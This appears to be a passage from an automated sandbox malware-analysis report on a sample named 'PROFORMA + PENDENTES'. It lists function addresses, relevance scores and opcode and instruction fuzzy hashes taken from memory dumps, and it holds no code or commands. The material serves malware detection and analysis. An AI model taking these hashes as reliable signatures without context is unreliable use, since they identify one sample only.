Opcode Fuzzy Hash: 2c7d6f348368d185ffc5bff7facf434eecd02c8884c591da510535f268e76213
Instruction Fuzzy Hash: 3122DC7590025ACFDB64EF64EC94A9DBBB2FF88301F1085A9D409A7368EB305D85DF80

Function 00FF0CA0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 934f58c9c9ffb53e8b9a53dd67c3100ee7d5f86c46c93ee4a11f82a2a0d6dc31
Instruction ID: 29f8381b4487fd82c11896fdf13f1238b2ce6ce434b70f67ddb351f4716806e5
Opcode Fuzzy Hash: 934f58c9c9ffb53e8b9a53dd67c3100ee7d5f86c46c93ee4a11f82a2a0d6dc31
Instruction Fuzzy Hash: 6D22DB7590025ACFDB64EF64EC94A9DB7B2FF88701F1085A9D409A7368EB306D85DF80

Function 00FF56A8 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa68395ca9aa3ad27f99944cf4a5d6eaa5cf1f0918ff19fe1934cf9fef412964
Instruction ID: 74f4d5913f7f15aa35315ce0649b4b456a6599bd8437b68bae48e88c5121ab58
Opcode Fuzzy Hash: aa68395ca9aa3ad27f99944cf4a5d6eaa5cf1f0918ff19fe1934cf9fef412964
Instruction Fuzzy Hash: CCB1D2317046588FDB259F78C854B7A7BE2AF89B60F244529EA06CB3A1DF74CC41E790

Function 00FF5C08 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cde49946bddcab8b730c13c5821289a8779bdc8abdc928920779937aeaa529
Instruction ID: 39d21176066be6ab942b6c98b16f5728fc8274c8f1cb4e4b9d6c92c1600e4d80
Opcode Fuzzy Hash: b8cde49946bddcab8b730c13c5821289a8779bdc8abdc928920779937aeaa529
Instruction Fuzzy Hash: 98817F31A05A098FCB14CFA9C888A7DBBB2BF89B11B258169D706EB371D731DD41DB50

Function 00FF7438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 745155d6465f802adcd6a5c83d68097ef4d9f544c9a767109234024e5fbf1368
Instruction ID: 223810bbd8d0e6ceed669ea2e7753d5ba5f1a9f509d037cabfcaef8762e7a882
Opcode Fuzzy Hash: 745155d6465f802adcd6a5c83d68097ef4d9f544c9a767109234024e5fbf1368
Instruction Fuzzy Hash: C8713C34B046098FCB65EF28C888A79BBE6AF49710F5900A9E605DB371DB70DC41DB90

Function 00FFCEC7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e828dca1be2fc2bfbda109d42255da0f64dcad01af9ec92d1b4bcc5d887284c
Instruction ID: 4cea8f44f758d1abf8d02235389f5a99ef3d78f622ee39cfcac561d6fe0f919f
Opcode Fuzzy Hash: 9e828dca1be2fc2bfbda109d42255da0f64dcad01af9ec92d1b4bcc5d887284c
Instruction Fuzzy Hash: A351BE3082174B8FC3342FA0E9BC16ABBA1FF1F7277956D50E20E850398B746489DB60

Function 00FFCED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc98b980808060d4e9e559466de6a7e926f752e8ac8566affef9658e77b9d06
Instruction ID: f87aa0a7a5a58c15d37717b9c75174722892d6346900ccfc1440a77662b408c8
Opcode Fuzzy Hash: 4fc98b980808060d4e9e559466de6a7e926f752e8ac8566affef9658e77b9d06
Instruction Fuzzy Hash: 2751AF3082170BCFD3742FA0E9BC16ABBA5FB0F7277916C10E10E850398B706485DB64

Function 00FF38F9 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a6d460fd40da00807cf246b58f027944e585c2e219e72c433ce6fad0a38cd5
Instruction ID: b21c2cf9958cbd6e125bcc58a944a173a47a7422b2905c05991cb840c9af58ce
Opcode Fuzzy Hash: 70a6d460fd40da00807cf246b58f027944e585c2e219e72c433ce6fad0a38cd5
Instruction Fuzzy Hash: 5451E475E01248CFCB08DFA9D8909ADBBF2FF89310B248469E805BB324DB35A845DF50

Function 00FFCD10 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf4fdb1a11fad533b29f2576e208890fdede900dca0f547d9e8ea5f7ba5cbd9
Instruction ID: 27aa518e9e3a158db929bd333cf80fd87df04066f88b5820ea200bd496fa8744
Opcode Fuzzy Hash: 8cf4fdb1a11fad533b29f2576e208890fdede900dca0f547d9e8ea5f7ba5cbd9
Instruction Fuzzy Hash: 15519574E01218DFDB58DFA9D9849DDBBF2BF89300F248169E819AB365DB30A941CF50

Function 00FF3908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4bd64d8dc9836bac6d3f4aa159913557913794693c4d7360cbf966efbbb45d
Instruction ID: e488f1c9bad7b322efdf857725f1c37134efc3d50ac803a7f4a8f61f3729fb17
Opcode Fuzzy Hash: 0f4bd64d8dc9836bac6d3f4aa159913557913794693c4d7360cbf966efbbb45d
Instruction Fuzzy Hash: E851B175E01248CFCB08DFA9D8909ADBBB2FF89310B208469E805BB324DB35A945DF50

Function 00FF9A63 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4c02f6d7c0b8fa3ade00277568f1e91735575c671de11410df1d5cf1b97ef8d
Instruction ID: 56a6d7d9ba4302e7bb3ba0a1a8b0b5ac8fd919ff6b058d02e84c1c88dbe8b0d8
Opcode Fuzzy Hash: a4c02f6d7c0b8fa3ade00277568f1e91735575c671de11410df1d5cf1b97ef8d
Instruction Fuzzy Hash: CC519031A0824DDFCF16CFA4D844BADBBB2AF89310F148155EA119B2B1D3B4D954EB50

Function 00FFA650 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30953331fdea5c36659c8a9c1e7a4bab917bfd0a0974959e67fdc5873b23fcc4
Instruction ID: e2e9b65e5ad08357a2b08726b67a42ef72adddaa4f7dc8b14700eb31fd807e52
Opcode Fuzzy Hash: 30953331fdea5c36659c8a9c1e7a4bab917bfd0a0974959e67fdc5873b23fcc4
Instruction Fuzzy Hash: 7941F535B003549FDB25AF68D814ABE7BB6AFC9320F248169D506D77A1CE348C46CB91

Function 00FF3428 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75724fec92617066259636a76f8e92075405d1bcf6a193f3915e7932bc7fa41a
Instruction ID: 899cdc6d9b6669baffa5fa45c1bf4b42c7723db375309e79f5a33b8cb31c0f5a
Opcode Fuzzy Hash: 75724fec92617066259636a76f8e92075405d1bcf6a193f3915e7932bc7fa41a
Instruction Fuzzy Hash: E831F972F0032D8BDF19DA66599433E65D6AFC4760F18403DDA16D33A0DF74CD44A255

Function 00FF4DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342c8d3f545c1aaa75c464fdf0bda928e127f62e13004e864389a1c9e2882cef
Instruction ID: 0ac55869bff18797018472e659b67473cc1ebaca6dbfc6edffca9632030e19b7
Opcode Fuzzy Hash: 342c8d3f545c1aaa75c464fdf0bda928e127f62e13004e864389a1c9e2882cef
Instruction Fuzzy Hash: 6F318D3160011A9FCB159F64D854ABF3BA2FF48321F504425FE1987364DB38DDA1EBA0

Function 00FF76D0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58fbe8b77b9944bee3a714d9bc66d9e7a55cb2f5a5de49b73d5a17ff722077d
Instruction ID: 16cc1c0f3354f2d504ca4151b4c5b61e828ea4915b982d0de833e5d2e4f45228
Opcode Fuzzy Hash: e58fbe8b77b9944bee3a714d9bc66d9e7a55cb2f5a5de49b73d5a17ff722077d
Instruction Fuzzy Hash: E821C73671C3188BEB25773A8C54A39BB979FD9724B1840B9D602CB775EE288C41F391

Function 00FFA809 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2954a88a70205be31ce3e41fa3cd1c6a6db44f6604e759af35aabb5cb7c5502c
Instruction ID: cdf7cf808196e81d7132d7f0f30ef765b37cfeffdd115156cea70b9d81acf087
Opcode Fuzzy Hash: 2954a88a70205be31ce3e41fa3cd1c6a6db44f6604e759af35aabb5cb7c5502c
Instruction Fuzzy Hash: 9731A470E006098FCB14CF6DC8849BEBBB2BF85360B158169E51A973B1CB74DC42CB91

Function 00FF76E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c03669f371d1bc5fd7ffaca9c029538a925ef268e6419703e135bdae4606d18
Instruction ID: e29297a5190db84505e79e83f1e62089fcca908fd244c10977893d61f786b8c0
Opcode Fuzzy Hash: 7c03669f371d1bc5fd7ffaca9c029538a925ef268e6419703e135bdae4606d18
Instruction Fuzzy Hash: DC21B83671831847EB2436268C54B7AB6979FD8B24F144079D602CB774EE29CC81B390

Function 00FF2060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8739d2f63a3a772473dbb5f4fe6ecfcda92ded193be1bd51c466294c8d840483
Instruction ID: 1516b49c8f797935f6e0a032d3d893e0af0f78963be14232b910d5bc52fe3aff
Opcode Fuzzy Hash: 8739d2f63a3a772473dbb5f4fe6ecfcda92ded193be1bd51c466294c8d840483
Instruction Fuzzy Hash: DF21A132A00148AFCF54DF78C8509BE7BB5EF98760B10C419D9199B390DB31EE41DBA1

Function 00FF5A63 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411dbddc83d8e1385c4b53d2d5c958875fdd6ab78de495f53ae9b27740858510
Instruction ID: 189a4ddc93785b610225d1a92ee2a19bf1de2defc9586f55d2b78bf1342b8590
Opcode Fuzzy Hash: 411dbddc83d8e1385c4b53d2d5c958875fdd6ab78de495f53ae9b27740858510
Instruction Fuzzy Hash: B121F531701A258FC3269B69C89453FBB62EF89B2071441A9EA06CB375CF34DC02D7D0

Function 00F4D4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1627641029.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f4d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791008042b465a86b42164f1bfed072af8cb0d0d41ac23905fdb13ad355f0ba7
Instruction ID: 07e17e0d558d80b2b609468e33a989c7a11d2c8def59383a3a17f57309dadea9
Opcode Fuzzy Hash: 791008042b465a86b42164f1bfed072af8cb0d0d41ac23905fdb13ad355f0ba7
Instruction Fuzzy Hash: 382103B2904204DFDB15DF10D9C0F26BF65FB98328F288569EC090A256C736D856EAA2

Function 00FFD11B Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5624be191592fe79b5408e0ec803222793e2c5df41a177a0d9882360f42a0a5
Instruction ID: ba7ac2a7f8b7fc56983904eadba07bcd6894cb72d1a9c4fbb21a4c5c4611b3c9
Opcode Fuzzy Hash: b5624be191592fe79b5408e0ec803222793e2c5df41a177a0d9882360f42a0a5
Instruction Fuzzy Hash: 95212531C102598ECB01EFE8D8146ECFBB1FF4A311F109629E555772A4EB306A5ADB90

Function 00FFD218 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6f0dff7feedec63cbfb88a5a060ac78cbea8aee92dfdea962ddc3ad5b3a079
Instruction ID: 4b6678aa0cb5c353d40b4c381b4ad215b1f481a85eae15d8975a6a91c3b28a7e
Opcode Fuzzy Hash: 3d6f0dff7feedec63cbfb88a5a060ac78cbea8aee92dfdea962ddc3ad5b3a079
Instruction Fuzzy Hash: 00213835A01249CFDB09DFB4D851AEDBBB2BF8A304F105868C815733A5CB359946CF25

Function 00FF215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5caedb5030d4505e4c74a1d1cfb79653f16ec23e55c7837598ca5d6c4ffc08b
Instruction ID: 962d9d38adbf14a12e04a94ec31a3df3832af46648940648fc7ba2a173bfa5fb
Opcode Fuzzy Hash: e5caedb5030d4505e4c74a1d1cfb79653f16ec23e55c7837598ca5d6c4ffc08b
Instruction Fuzzy Hash: A3117F32E0434D9FCF019BF89C004EEBB30FF8A320B254796D562B7150EA311906C790

Function 00FF39ED Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697d626686c3d6ebfe008e779d68a202f4924eb8097c895ac0909997c04357c2
Instruction ID: efa660ffef60f93e46d874ba61bbff3c5534998c2c524731b7860f4d78497a83
Opcode Fuzzy Hash: 697d626686c3d6ebfe008e779d68a202f4924eb8097c895ac0909997c04357c2
Instruction Fuzzy Hash: 8331A579E01348CFCB44EFA8E5948ADBBB2FF49311B204469E819AB324D735AD45DF50

Function 00FF4DBB Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0c3dc6fa644d67a3f94509d5b398473ad30c9e8231b0fd98dd6e6f909a515a
Instruction ID: a2fa9b31d0d2deee01826a612b535d1283b8ab6c37363b6d9245d112610b1023
Opcode Fuzzy Hash: ac0c3dc6fa644d67a3f94509d5b398473ad30c9e8231b0fd98dd6e6f909a515a
Instruction Fuzzy Hash: 0021D431A042599FCB259F68D85467B3FA2FF84324F104469F9058B365CB38DD51DBA0

Function 00FFD228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77cd51cb50c0eddeb705501e0d12456daf9e8a71c27726f8332ccf05ea6b1f1
Instruction ID: f1d01484acf00a0a18b826a6f9b24da86130f12ba086b97b915176257f38e45a
Opcode Fuzzy Hash: b77cd51cb50c0eddeb705501e0d12456daf9e8a71c27726f8332ccf05ea6b1f1
Instruction Fuzzy Hash: F52106359012088BCB09DBB4D850AEDB7B2FF8A304F105428C805733A4DB35A946CF65

Function 00FF5A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4cab39eae2ac2341559f22b9c515b5f34965e27a7d76ad2541c83516a52091a
Instruction ID: eb56cb3e63091413e982a2913e13f5cf9dc61882ca237cc3b9ba6083ae15ac71
Opcode Fuzzy Hash: c4cab39eae2ac2341559f22b9c515b5f34965e27a7d76ad2541c83516a52091a
Instruction Fuzzy Hash: 3E11C2317019259FD7259A2AC89493EB7A6BFC4B6171441A9EA06CB374DF34DC0297D0

Function 00F4D4EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1627641029.0000000000F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f4d000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
Instruction ID: fce65d292705c773359984563ef7cec63e3635e941c6752efa21ebfb0e2a3590
Opcode Fuzzy Hash: d9902afee9e3b44ff2e822c933ca4f9850614e81a5517644e66c67081f9efd2f
Instruction Fuzzy Hash: 3C11B176904240CFCB15CF10D5C4B16BF72FB94328F28C5A9DC090B656C336D85ADBA1

Function 00FF1F61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96365311e583f8b01c1811c08bf94672febf1f0449fb748ab409da05008c18d6
Instruction ID: 7df8592b32aba09df79a1a1af65eebcb584652d5d2ef6c683509770af1e1f265
Opcode Fuzzy Hash: 96365311e583f8b01c1811c08bf94672febf1f0449fb748ab409da05008c18d6
Instruction Fuzzy Hash: 1F2100B4C0424A8FDB51EFA8D8555EDBFF0BF0A300F5041AAD905F7264EB305A85CBA1

Function 00FF1F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44eaaa5093565a81d4932f799ed139489ba63bdaef45f4e3066c6bc33d4ff297
Instruction ID: 32f69230eb6a824ef2cd6d7724e8fe037acb212553d3db7c76725f43f8b4e1d5
Opcode Fuzzy Hash: 44eaaa5093565a81d4932f799ed139489ba63bdaef45f4e3066c6bc33d4ff297
Instruction Fuzzy Hash: 1221D075D0460E8FCB20EFA8D8545EEBFF0BF4A310F50416AE905B7264EB305A85DBA1

Function 00FF5607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e7a10ece0dc3a26680a019416a7077b109980c08e758cba97e55b68fe0ccf2
Instruction ID: 12f22eadcac88a253f2ea2ffca5948887e8ffa9c97a534d48aab6654ee7f962c
Opcode Fuzzy Hash: 79e7a10ece0dc3a26680a019416a7077b109980c08e758cba97e55b68fe0ccf2
Instruction Fuzzy Hash: C6012872B041185FDB168E689C107FE3FA7DFC9751B68806AFA14CB2A4CE358C52E790

Function 00FF2010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627b7f6676ac507f01320d614e6d5e4711d596339f2fdab7fd4b7e3a3ef277ad
Instruction ID: 6a5fea126f7d49ea198b3f939d478c74cf6759f1e1cd46ebcdf2bbf8b527e7c8
Opcode Fuzzy Hash: 627b7f6676ac507f01320d614e6d5e4711d596339f2fdab7fd4b7e3a3ef277ad
Instruction Fuzzy Hash: F1E09231D643968BCB029B7898014EEBF74EED3310B9A82E7C4A16B482E770195AC771

Function 00FF2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4efc10991eafdf583158c6e4b09f2babf846799a3c5be4cd89cc8ddabfb70f
Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
Opcode Fuzzy Hash: 3b4efc10991eafdf583158c6e4b09f2babf846799a3c5be4cd89cc8ddabfb70f
Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1

Function 00FF8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 9f6991ec6ae576b23c6bc5e6d9462dcb18e40c161f65000038686e65a8bbffbc
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 35C0123350C1282A9624104E7C40AB7674CC6C17F49250137F61C9721098425C4111A4

Function 00FFA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21e71a2b10f9dae22ce8c1cb9c2ca926a08b65b2e9bd12d523c20137cc6594b4
Instruction ID: 6e5551a88a637f3bb08d0665389632b6ab857988798558ff692d4e0ed5e53614
Opcode Fuzzy Hash: 21e71a2b10f9dae22ce8c1cb9c2ca926a08b65b2e9bd12d523c20137cc6594b4
Instruction Fuzzy Hash: E2D0677AB01008AFDB149F98E850DDDF7B6FB9C221B548116E915A3264C6319961DB50

Function 00FF5EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4b10e6d0c40ca954bebf59f2b256205dba44624020e509ea7d4301f4438d5c
Instruction ID: 3dc4f8863325008ddeddd6f0e25ffd80da4560f113ed735c5ce6fba98673fb46
Opcode Fuzzy Hash: db4b10e6d0c40ca954bebf59f2b256205dba44624020e509ea7d4301f4438d5c
Instruction Fuzzy Hash: 12D02B309043454BC716FB30FC154683B357BC0204B5049DAE8014A51AEB7C4D064B52

Function 00FF5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9ece18f98bd801eb5b3a9480474b9d3e5e28094fdd036974a94927671e5717
Instruction ID: 362ead112d875f50da7d3c34b3c3afe943ce209340ce9de3a4aaed8335ef78bb
Opcode Fuzzy Hash: de9ece18f98bd801eb5b3a9480474b9d3e5e28094fdd036974a94927671e5717
